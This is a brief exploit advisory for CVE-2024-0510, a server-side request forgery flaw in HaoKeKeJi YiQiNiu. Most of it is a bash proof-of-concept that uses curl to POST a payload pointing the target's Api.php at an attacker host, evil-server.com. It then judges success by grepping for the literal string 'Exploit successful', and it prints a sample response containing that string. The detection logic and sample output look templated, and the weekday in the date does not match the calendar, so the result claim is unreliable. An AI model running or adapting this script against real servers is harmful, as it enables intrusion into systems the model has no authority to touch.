HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.
advisories | CVE-2024-0510
#!/bin/bash
# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"
# Send the malicious request
response=$(curl -s -X POST -d "$payload" "$target_url")
# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
echo "Exploit succeeded"
else
echo "Exploit failed"
fi
# Example payload and response
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive
Exploit successful"